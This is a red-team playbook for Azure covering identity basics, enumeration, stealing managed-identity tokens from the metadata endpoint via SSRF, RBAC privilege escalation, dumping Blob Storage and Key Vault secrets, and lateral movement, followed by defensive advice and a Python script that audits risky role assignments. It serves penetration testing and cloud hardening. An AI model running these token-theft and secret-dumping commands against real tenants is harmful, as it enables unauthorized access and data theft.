Azure
This playbook provides a red teaming methodology for Azure environments. It covers Azure cloud fundamentals, enumeration and exploitation techniques, real-world CTF-style scenarios, and the commands and tools involved.
1. Azure Cloud Overview
Core Components
Azure Active Directory (AAD / Entra ID) – Identity & Access Management (users, groups, roles, service principals, managed identities).
Azure Resource Manager (ARM) – Control plane for deploying, managing, securing resources.
Office 365 / M365 – Productivity suite, integrated with AAD.
Cloud Spaces
Control Plane: ARM API, Azure Portal, PowerShell, CLI.
Data Plane: Actual resources (VMs, Blob Storage, Functions, etc.).
Identity Plane: AAD identities, tokens, RBAC.
2. Authentication in Azure
Methods
Username & Password (long-term)
az login
Connect-AzAccount
Connect-MgGraph -Scopes "Directory.Read.All"
Service Principal (App ID + Secret/Cert)
az login --service-principal -u <AppID> -p <Password> --tenant <TenantID>
$cred = Get-Credential   # username = AppID, password = client secret
Connect-AzAccount -ServicePrincipal -Tenant <TenantID> -Credential $cred
Access Token (short-term)
az account get-access-token --resource=https://management.azure.com
Connect-AzAccount -AccessToken <AAD_AccessToken> -AccountId <AccountId>   # -AccountId (UPN or AppID) is mandatory with -AccessToken
Instance Metadata Service (IMDS) – Auto-issued tokens inside VMs
curl -H "Metadata:true" \
  "http://169.254.169.254/metadata/identity/oauth2/token?api-version=2018-02-01&resource=https://management.azure.com/"
Concept: IMDS
169.254.169.254 = internal IP for Azure metadata. Exposes OAuth2 tokens for Managed Identity.
Requests must carry the Metadata: true header; an SSRF that cannot set request headers cannot reach it.
Exploitable via SSRF or local compromise.
IMDSv1: No session binding → SSRF-prone.
IMDSv2 (work in progress for Azure, stronger binding).
3. Enumeration Phase
AAD Discovery
Check if target org uses Entra ID:
curl "https://login.microsoftonline.com/getuserrealm.srf?login=<user>@<domain>&xml=1"
List current session:
Get-MgContext
Enumerate roles:
Get-MgDirectoryRole | ConvertTo-Json
Get-MgDirectoryRoleMember -DirectoryRoleId <RoleID> -All | ConvertTo-Json
Enumerate users & groups:
Get-MgUser
Get-MgUserMemberOf -UserId <UserID>
Get-MgGroup
Get-MgGroupMember -GroupId <GroupID> | ConvertTo-Json
Applications / Service Principals:
Get-MgApplication
Get-MgApplication -ApplicationId <AppObjectID> | ConvertTo-Json
Get-MgApplicationOwner -ApplicationId <AppObjectID> | ConvertTo-Json
4. Exploitation Scenarios
4.1 SSRF → IMDS Token Theft
Find SSRF in a web app on Azure VM.
Target IMDS endpoint:
curl -H "Metadata:true" \
  "http://169.254.169.254/metadata/identity/oauth2/token?api-version=2018-02-01&resource=https://graph.microsoft.com/"
→ Returns access token for Microsoft Graph API.
Authenticate with the stolen token:
az account get-access-token --resource https://graph.microsoft.com
Connect-AzAccount -AccessToken <Token> -AccountId <AccountId>   # -AccountId is mandatory with -AccessToken
Enumerate tenant, users, groups with Graph API.
4.2 ARM Token Abuse
Request ARM-scoped token from IMDS:
curl -H "Metadata:true" \
  "http://169.254.169.254/metadata/identity/oauth2/token?api-version=2018-02-01&resource=https://management.azure.com/"
Enumerate resources:
az vm list --output table
az storage account list --output table
4.3 Privilege Escalation via RBAC
List roles:
az role assignment list --all
If the attacker holds Owner/Contributor → can create new roles or assign higher privileges.
Example: attach the User Access Administrator role → take over.
4.4 Service Principal Abuse
If SP creds are leaked (from GitHub, etc.):
az login --service-principal -u <AppID> -p <Password> --tenant <TenantID>
Check assigned roles → escalate or pivot.
5. Post-Exploitation
Dump data from Blob Storage:
az storage blob list --account-name <storage> --container-name <container>
az storage blob download --account-name <storage> --container-name <container> --name <blob> --file dump.txt
Enumerate Key Vault secrets:
az keyvault secret list --vault-name <vault>
az keyvault secret show --vault-name <vault> --name <secret>
6. Lateral Movement
Use stolen tokens to pivot tenants/subscriptions.
Exploit custom role definitions to gain indirect access.
Example scenario from a CTF (generalized):
Attacker compromises VM → retrieves IMDS token.
Token has Reader role at subscription level.
However, the token also holds a custom role at VM resource scope → allows reading group info.
From there, attacker enumerates applications and pivots via Graph API.
7. Detection & Defense
Enable Azure AD logs & alerts: Monitor anomalous logins, token use.
Restrict IMDS exposure: Disable public endpoints, enforce network rules.
Use Conditional Access: Restrict Graph API access by location/device.
RBAC Hardening: Audit custom roles, remove broad assignments.
Key Vault: Enable firewall & access policies.
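Added example (not part of the original playbook): a small Python audit for the RBAC hardening item above, run over constructed samples in the shape of `az role assignment list --all -o json` and `az role definition list --custom-role-only true -o json`. It flags Owner/Contributor/User Access Administrator assignments above resource-group scope and custom roles whose actions cover writing role assignments or definitions, the two conditions the privilege-escalation and lateral-movement sections rely on; the principal names, subscription ID and custom role are placeholders.

```python
import fnmatch

# Constructed sample shaped like `az role assignment list --all -o json`
# (only the fields the audit reads; the subscription ID is a placeholder).
SUB = "/subscriptions/00000000-0000-0000-0000-000000000000"
SAMPLE_ASSIGNMENTS = [
    {"principalName": "alice@contoso.example", "roleDefinitionName": "Reader", "scope": SUB},
    {"principalName": "build-pipeline-sp", "roleDefinitionName": "User Access Administrator",
     "scope": SUB},
    {"principalName": "web01-identity", "roleDefinitionName": "Custom VM Operator",
     "scope": SUB + "/resourceGroups/rg-web/providers/Microsoft.Compute/virtualMachines/web01"},
]
# Constructed sample shaped like `az role definition list --custom-role-only true -o json`.
SAMPLE_CUSTOM_ROLES = [
    {"roleName": "Custom VM Operator",
     "permissions": [{"actions": ["Microsoft.Compute/virtualMachines/*",
                                  "Microsoft.Authorization/roleAssignments/write"],
                      "notActions": []}]},
]

BROAD_ROLES = {"Owner", "Contributor", "User Access Administrator"}
# Writing role assignments or definitions lets a principal grant itself more rights.
GRANT_ACTIONS = ("Microsoft.Authorization/roleAssignments/write",
                 "Microsoft.Authorization/roleDefinitions/write")

def is_wide_scope(scope):
    """Root, management-group or subscription scope (anything above a resource group)."""
    parts = [p for p in scope.split("/") if p]
    return len(parts) <= 2 or parts[1].lower() == "microsoft.management"

def covers(patterns, action):
    # Azure actions are case-insensitive and '*' spans '/' segments, so fnmatch on lowercase.
    return any(fnmatch.fnmatchcase(action.lower(), p.lower()) for p in patterns)

def grants_rbac_write(role):
    """True if some permission block allows an RBAC-granting action without denying it."""
    return any(covers(p["actions"], act) and not covers(p.get("notActions", []), act)
               for p in role["permissions"] for act in GRANT_ACTIONS)

def audit(assignments, custom_roles):
    """Return (principal, reason) pairs for assignments that deserve review."""
    risky_custom = {r["roleName"] for r in custom_roles if grants_rbac_write(r)}
    findings = []
    for a in assignments:
        role = a["roleDefinitionName"]
        if role in BROAD_ROLES and is_wide_scope(a["scope"]):
            findings.append((a["principalName"], f"{role} assigned at wide scope {a['scope']}"))
        if role in risky_custom:
            findings.append((a["principalName"], f"custom role '{role}' can write RBAC"))
    return findings
```

To run it against a real subscription, replace the two sample lists with `json.load()` of the output of the two az commands named above.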